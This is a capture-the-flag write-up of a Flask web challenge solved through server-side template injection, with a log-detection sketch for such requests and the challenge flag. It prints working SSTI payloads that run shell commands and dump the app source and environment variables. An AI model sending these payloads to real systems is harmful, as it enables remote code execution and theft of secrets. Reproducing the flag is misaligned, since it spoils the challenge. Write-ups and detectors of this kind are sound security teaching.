AUCHALL - [Web] - Temp


Challenge Description

I'm temporarily storing files for you...

Solution

On opening the challenge, we were given a portfolio website.

Nothing is interesting until you check for different paths on the website: /login and /check.

Let's suppose we go to /check.

We see that our endpoint name is reflected on the page, which gave me a hint for XSS. But wait, we wouldn't get anything from that unless a bot is involved, so I skipped XSS. Then I checked for server-side template injection (SSTI):

http://SERVER-IP:PORT/{{7*7}}

I got 49, which confirms that there is SSTI.

Then I used an SSTI payload to run shell commands:

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}

App Source Code

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}

The source contains app.config["FLAG"] = "You're at the right path, but no. The flag is not here." This tells me that I have to fuzz the container.

Then I checked env.

Flag is in env

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}
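The requests above carry Jinja2 delimiters and dunder attribute chains in the URL path, so they stand out in a web access log. The detection sketch below is an added example, not part of the original writeup; the log format (common/combined), the sample log lines and the IP addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Jinja2 expression/statement delimiters, as in the {{7*7}} test above.
DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder attributes and calls that appear in this writeup's payloads.
TRAVERSAL = re.compile(r"__(?:init|globals|builtins|import)__|popen")
# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not from the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /check HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /%7B%7B%20self.__init__.__globals__%20%7D%7D HTTP/1.1" 200 2210',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /login HTTP/1.1" 200 734',
]

def decode_path(raw, rounds=3):
    """URL-decode up to `rounds` times so double-encoded braces are still seen."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def classify(path):
    """Return 'probe', 'traversal' or None for one raw request path."""
    decoded = decode_path(path)
    if not DELIMS.search(decoded):
        return None
    return "traversal" if TRAVERSAL.search(decoded) else "probe"

def scan(lines):
    """Return (client_ip, verdict, decoded_path) for each suspicious entry."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((line.split()[0], verdict, decode_path(match.group(1))))
    return hits

if __name__ == "__main__":
    for ip, verdict, path in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{path}")
```

This only inspects the request side; a 200 response whose body contains the evaluated result (49 for the probe above) is the stronger signal that the template engine actually rendered the input.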


Flag

Flag is dynamic

CY243L{sst1s_1n_fl4sk_ar3_ez_pz_CAa3Ee9_ZcdU_XPJ3}

Writeups 2023 © RootxRAN.